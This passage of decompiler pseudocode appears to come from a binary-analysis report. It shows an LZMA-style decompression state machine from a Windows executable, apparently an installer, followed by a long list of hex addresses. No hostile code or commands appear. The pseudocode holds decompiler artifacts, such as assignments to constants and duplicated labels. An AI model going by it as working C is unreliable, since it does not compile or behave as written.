                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t156 = __ebp - 0x70;
                                                              												 *_t156 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t156;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												while(1) {
                                                              													L48:
                                                              													__eflags = __ebx - 0x100;
                                                              													if(__ebx >= 0x100) {
                                                              														break;
                                                              													}
                                                              													__eax =  *(__ebp - 0x58);
                                                              													__edx = __ebx + __ebx;
                                                              													__ecx =  *(__ebp - 0x10);
                                                              													__esi = __edx + __eax;
                                                              													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              													__ax =  *__esi;
                                                              													 *(__ebp - 0x54) = __esi;
                                                              													__edi = __ax & 0x0000ffff;
                                                              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              													__eflags =  *(__ebp - 0xc) - __ecx;
                                                              													if( *(__ebp - 0xc) >= __ecx) {
                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              														__cx = __ax;
                                                              														_t170 = __edx + 1; // 0x1
                                                              														__ebx = _t170;
                                                              														__cx = __ax >> 5;
                                                              														__eflags = __eax;
                                                              														 *__esi = __ax;
                                                              													} else {
                                                              														 *(__ebp - 0x10) = __ecx;
                                                              														0x800 = 0x800 - __edi;
                                                              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              														__ebx = __ebx + __ebx;
                                                              														 *__esi = __cx;
                                                              													}
                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              													 *(__ebp - 0x44) = __ebx;
                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                              														continue;
                                                              													} else {
                                                              														goto L46;
                                                              													}
                                                              												}
                                                              												L54:
                                                              												_t173 = __ebp - 0x34;
                                                              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                              												__eflags =  *_t173;
                                                              												goto L55;
                                                              											case 0xf:
                                                              												L58:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0xf;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t203 = __ebp - 0x70;
                                                              												 *_t203 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t203;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												L60:
                                                              												__eflags = __ebx - 0x100;
                                                              												if(__ebx >= 0x100) {
                                                              													L55:
                                                              													__al =  *(__ebp - 0x44);
                                                              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                              													goto L56;
                                                              												}
                                                              												L61:
                                                              												__eax =  *(__ebp - 0x58);
                                                              												__edx = __ebx + __ebx;
                                                              												__ecx =  *(__ebp - 0x10);
                                                              												__esi = __edx + __eax;
                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              												__ax =  *__esi;
                                                              												 *(__ebp - 0x54) = __esi;
                                                              												__edi = __ax & 0x0000ffff;
                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              													__cx = __ax;
                                                              													_t217 = __edx + 1; // 0x1
                                                              													__ebx = _t217;
                                                              													__cx = __ax >> 5;
                                                              													__eflags = __eax;
                                                              													 *__esi = __ax;
                                                              												} else {
                                                              													 *(__ebp - 0x10) = __ecx;
                                                              													0x800 = 0x800 - __edi;
                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              													__ebx = __ebx + __ebx;
                                                              													 *__esi = __cx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													goto L60;
                                                              												} else {
                                                              													goto L58;
                                                              												}
                                                              											case 0x10:
                                                              												L109:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0x10;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t365 = __ebp - 0x70;
                                                              												 *_t365 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t365;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												goto L111;
                                                              											case 0x11:
                                                              												L68:
                                                              												_t614 =  *(_t621 - 0x58);
                                                              												 *(_t621 - 0x84) = 0x12;
                                                              												while(1) {
                                                              													L132:
                                                              													 *(_t621 - 0x54) = _t614;
                                                              													goto L133;
                                                              												}
                                                              											case 0x12:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													__eax =  *(__ebp - 0x58);
                                                              													 *(__ebp - 0x84) = 0x13;
                                                              													__esi =  *(__ebp - 0x58) + 2;
                                                              													while(1) {
                                                              														L132:
                                                              														 *(_t621 - 0x54) = _t614;
                                                              														goto L133;
                                                              													}
                                                              												}
                                                              												__eax =  *(__ebp - 0x4c);
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                              												__ecx =  *(__ebp - 0x58);
                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                              												__eflags = __eax;
                                                              												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                              												goto L130;
                                                              											case 0x13:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													_t469 = __ebp - 0x58;
                                                              													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                              													__eflags =  *_t469;
                                                              													 *(__ebp - 0x30) = 0x10;
                                                              													 *(__ebp - 0x40) = 8;
                                                              													L144:
                                                              													 *(__ebp - 0x7c) = 0x14;
                                                              													goto L145;
                                                              												}
                                                              												__eax =  *(__ebp - 0x4c);
                                                              												__ecx =  *(__ebp - 0x58);
                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                              												 *(__ebp - 0x30) = 8;
                                                              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                              												L130:
                                                              												 *(__ebp - 0x58) = __eax;
                                                              												 *(__ebp - 0x40) = 3;
                                                              												goto L144;
                                                              											case 0x14:
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                              												__eax =  *(__ebp - 0x80);
                                                              												 *(_t621 - 0x88) = _t542;
                                                              												goto L1;
                                                              											case 0x15:
                                                              												__eax = 0;
                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              												__al = __al & 0x000000fd;
                                                              												__eax = (__eflags >= 0) - 1 + 0xb;
                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                              												goto L120;
                                                              											case 0x16:
                                                              												__eax =  *(__ebp - 0x30);
                                                              												__eflags = __eax - 4;
                                                              												if(__eax >= 4) {
                                                              													_push(3);
                                                              													_pop(__eax);
                                                              												}
                                                              												__ecx =  *(__ebp - 4);
                                                              												 *(__ebp - 0x40) = 6;
                                                              												__eax = __eax << 7;
                                                              												 *(__ebp - 0x7c) = 0x19;
                                                              												 *(__ebp - 0x58) = __eax;
                                                              												goto L145;
                                                              											case 0x17:
                                                              												L145:
                                                              												__eax =  *(__ebp - 0x40);
                                                              												 *(__ebp - 0x50) = 1;
                                                              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                              												goto L149;
                                                              											case 0x18:
                                                              												L146:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0x18;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t484 = __ebp - 0x70;
                                                              												 *_t484 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t484;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												L148:
                                                              												_t487 = __ebp - 0x48;
                                                              												 *_t487 =  *(__ebp - 0x48) - 1;
                                                              												__eflags =  *_t487;
                                                              												L149:
                                                              												__eflags =  *(__ebp - 0x48);
                                                              												if( *(__ebp - 0x48) <= 0) {
                                                              													__ecx =  *(__ebp - 0x40);
                                                              													__ebx =  *(__ebp - 0x50);
                                                              													0 = 1;
                                                              													__eax = 1 << __cl;
                                                              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                              													__eax =  *(__ebp - 0x7c);
                                                              													 *(__ebp - 0x44) = __ebx;
                                                              													while(1) {
                                                              														 *(_t621 - 0x88) = _t542;
                                                              														goto L1;
                                                              													}
                                                              												}
                                                              												__eax =  *(__ebp - 0x50);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              												__eax =  *(__ebp - 0x58);
                                                              												__esi = __edx + __eax;
                                                              												 *(__ebp - 0x54) = __esi;
                                                              												__ax =  *__esi;
                                                              												__edi = __ax & 0x0000ffff;
                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              													__cx = __ax;
                                                              													__cx = __ax >> 5;
                                                              													__eax = __eax - __ecx;
                                                              													__edx = __edx + 1;
                                                              													__eflags = __edx;
                                                              													 *__esi = __ax;
                                                              													 *(__ebp - 0x50) = __edx;
                                                              												} else {
                                                              													 *(__ebp - 0x10) = __ecx;
                                                              													0x800 = 0x800 - __edi;
                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              													 *__esi = __cx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													goto L148;
                                                              												} else {
                                                              													goto L146;
                                                              												}
                                                              											case 0x19:
                                                              												__eflags = __ebx - 4;
                                                              												if(__ebx < 4) {
                                                              													 *(__ebp - 0x2c) = __ebx;
                                                              													L119:
                                                              													_t393 = __ebp - 0x2c;
                                                              													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                              													__eflags =  *_t393;
                                                              													L120:
                                                              													__eax =  *(__ebp - 0x2c);
                                                              													__eflags = __eax;
                                                              													if(__eax == 0) {
                                                              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                              														goto L170;
                                                              													}
                                                              													__eflags = __eax -  *(__ebp - 0x60);
                                                              													if(__eax >  *(__ebp - 0x60)) {
                                                              														goto L171;
                                                              													}
                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                              													__eax =  *(__ebp - 0x30);
                                                              													_t400 = __ebp - 0x60;
                                                              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                              													__eflags =  *_t400;
                                                              													goto L123;
                                                              												}
                                                              												__ecx = __ebx;
                                                              												__eax = __ebx;
                                                              												__ecx = __ebx >> 1;
                                                              												__eax = __ebx & 0x00000001;
                                                              												__ecx = (__ebx >> 1) - 1;
                                                              												__al = __al | 0x00000002;
                                                              												__eax = (__ebx & 0x00000001) << __cl;
                                                              												__eflags = __ebx - 0xe;
                                                              												 *(__ebp - 0x2c) = __eax;
                                                              												if(__ebx >= 0xe) {
                                                              													__ebx = 0;
                                                              													 *(__ebp - 0x48) = __ecx;
                                                              													L102:
                                                              													__eflags =  *(__ebp - 0x48);
                                                              													if( *(__ebp - 0x48) <= 0) {
                                                              														__eax = __eax + __ebx;
                                                              														 *(__ebp - 0x40) = 4;
                                                              														 *(__ebp - 0x2c) = __eax;
                                                              														__eax =  *(__ebp - 4);
                                                              														__eax =  *(__ebp - 4) + 0x644;
                                                              														__eflags = __eax;
                                                              														L108:
                                                              														__ebx = 0;
                                                              														 *(__ebp - 0x58) = __eax;
                                                              														 *(__ebp - 0x50) = 1;
                                                              														 *(__ebp - 0x44) = 0;
                                                              														 *(__ebp - 0x48) = 0;
                                                              														L112:
                                                              														__eax =  *(__ebp - 0x40);
                                                              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                              															_t391 = __ebp - 0x2c;
                                                              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                              															__eflags =  *_t391;
                                                              															goto L119;
                                                              														}
                                                              														__eax =  *(__ebp - 0x50);
                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              														__eax =  *(__ebp - 0x58);
                                                              														__esi = __edi + __eax;
                                                              														 *(__ebp - 0x54) = __esi;
                                                              														__ax =  *__esi;
                                                              														__ecx = __ax & 0x0000ffff;
                                                              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                              														__eflags =  *(__ebp - 0xc) - __edx;
                                                              														if( *(__ebp - 0xc) >= __edx) {
                                                              															__ecx = 0;
                                                              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                              															__ecx = 1;
                                                              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                              															__ebx = 1;
                                                              															__ecx =  *(__ebp - 0x48);
                                                              															__ebx = 1 << __cl;
                                                              															__ecx = 1 << __cl;
                                                              															__ebx =  *(__ebp - 0x44);
                                                              															__ebx =  *(__ebp - 0x44) | __ecx;
                                                              															__cx = __ax;
                                                              															__cx = __ax >> 5;
                                                              															__eax = __eax - __ecx;
                                                              															__edi = __edi + 1;
                                                              															__eflags = __edi;
                                                              															 *(__ebp - 0x44) = __ebx;
                                                              															 *__esi = __ax;
                                                              															 *(__ebp - 0x50) = __edi;
                                                              														} else {
                                                              															 *(__ebp - 0x10) = __edx;
                                                              															0x800 = 0x800 - __ecx;
                                                              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              															 *__esi = __dx;
                                                              														}
                                                              														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              														if( *(__ebp - 0x10) >= 0x1000000) {
                                                              															L111:
                                                              															_t368 = __ebp - 0x48;
                                                              															 *_t368 =  *(__ebp - 0x48) + 1;
                                                              															__eflags =  *_t368;
                                                              															goto L112;
                                                              														} else {
                                                              															goto L109;
                                                              														}
                                                              													}
                                                              													__ecx =  *(__ebp - 0xc);
                                                              													__ebx = __ebx + __ebx;
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              													 *(__ebp - 0x44) = __ebx;
                                                              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                              														__ecx =  *(__ebp - 0x10);
                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              														__ebx = __ebx | 0x00000001;
                                                              														__eflags = __ebx;
                                                              														 *(__ebp - 0x44) = __ebx;
                                                              													}
                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                              														L101:
                                                              														_t338 = __ebp - 0x48;
                                                              														 *_t338 =  *(__ebp - 0x48) - 1;
                                                              														__eflags =  *_t338;
                                                              														goto L102;
                                                              													} else {
                                                              														goto L99;
                                                              													}
                                                              												}
                                                              												__edx =  *(__ebp - 4);
                                                              												__eax = __eax - __ebx;
                                                              												 *(__ebp - 0x40) = __ecx;
                                                              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                              												goto L108;
                                                              											case 0x1a:
                                                              												L56:
                                                              												__eflags =  *(__ebp - 0x64);
                                                              												if( *(__ebp - 0x64) == 0) {
                                                              													 *(__ebp - 0x88) = 0x1a;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x68);
                                                              												__al =  *(__ebp - 0x5c);
                                                              												__edx =  *(__ebp - 8);
                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              												 *( *(__ebp - 0x68)) = __al;
                                                              												__ecx =  *(__ebp - 0x14);
                                                              												 *(__ecx +  *(__ebp - 8)) = __al;
                                                              												__eax = __ecx + 1;
                                                              												__edx = 0;
                                                              												_t192 = __eax %  *(__ebp - 0x74);
                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                              												__edx = _t192;
                                                              												goto L79;
                                                              											case 0x1b:
                                                              												L75:
                                                              												__eflags =  *(__ebp - 0x64);
                                                              												if( *(__ebp - 0x64) == 0) {
                                                              													 *(__ebp - 0x88) = 0x1b;
                                                              													goto L170;
                                                              												}
                                                              												__eax =  *(__ebp - 0x14);
                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                              													__eflags = __eax;
                                                              												}
                                                              												__edx =  *(__ebp - 8);
                                                              												__cl =  *(__eax + __edx);
                                                              												__eax =  *(__ebp - 0x14);
                                                              												 *(__ebp - 0x5c) = __cl;
                                                              												 *(__eax + __edx) = __cl;
                                                              												__eax = __eax + 1;
                                                              												__edx = 0;
                                                              												_t274 = __eax %  *(__ebp - 0x74);
                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                              												__edx = _t274;
                                                              												__eax =  *(__ebp - 0x68);
                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              												_t283 = __ebp - 0x64;
                                                              												 *_t283 =  *(__ebp - 0x64) - 1;
                                                              												__eflags =  *_t283;
                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                              												L79:
                                                              												 *(__ebp - 0x14) = __edx;
                                                              												goto L80;
                                                              											case 0x1c:
                                                              												while(1) {
                                                              													L123:
                                                              													__eflags =  *(__ebp - 0x64);
                                                              													if( *(__ebp - 0x64) == 0) {
                                                              														break;
                                                              													}
                                                              													__eax =  *(__ebp - 0x14);
                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                              														__eflags = __eax;
                                                              													}
                                                              													__edx =  *(__ebp - 8);
                                                              													__cl =  *(__eax + __edx);
                                                              													__eax =  *(__ebp - 0x14);
                                                              													 *(__ebp - 0x5c) = __cl;
                                                              													 *(__eax + __edx) = __cl;
                                                              													__eax = __eax + 1;
                                                              													__edx = 0;
                                                              													_t414 = __eax %  *(__ebp - 0x74);
                                                              													__eax = __eax /  *(__ebp - 0x74);
                                                              													__edx = _t414;
                                                              													__eax =  *(__ebp - 0x68);
                                                              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                              													__eflags =  *(__ebp - 0x30);
                                                              													 *( *(__ebp - 0x68)) = __cl;
                                                              													 *(__ebp - 0x14) = _t414;
                                                              													if( *(__ebp - 0x30) > 0) {
                                                              														continue;
                                                              													} else {
                                                              														L80:
                                                              														 *(__ebp - 0x88) = 2;
                                                              														goto L1;
                                                              													}
                                                              												}
                                                              												 *(__ebp - 0x88) = 0x1c;
                                                              												goto L170;
                                                              										}
                                                              									}
                                                              									L171:
                                                              									_t544 = _t543 | 0xffffffff;
                                                              									goto L172;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              					goto L1;
                                                              				}
                                                              			}














                                                              0x00000000
                                                              0x00406ffe
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407023
                                                              0x0040702a
                                                              0x00407030
                                                              0x00407036
                                                              0x00407048
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407004
                                                              0x0040700a
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x004075e5
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x004075fd
                                                              0x00407601
                                                              0x00407601
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00407441
                                                              0x00407441
                                                              0x00407447
                                                              0x00407447
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
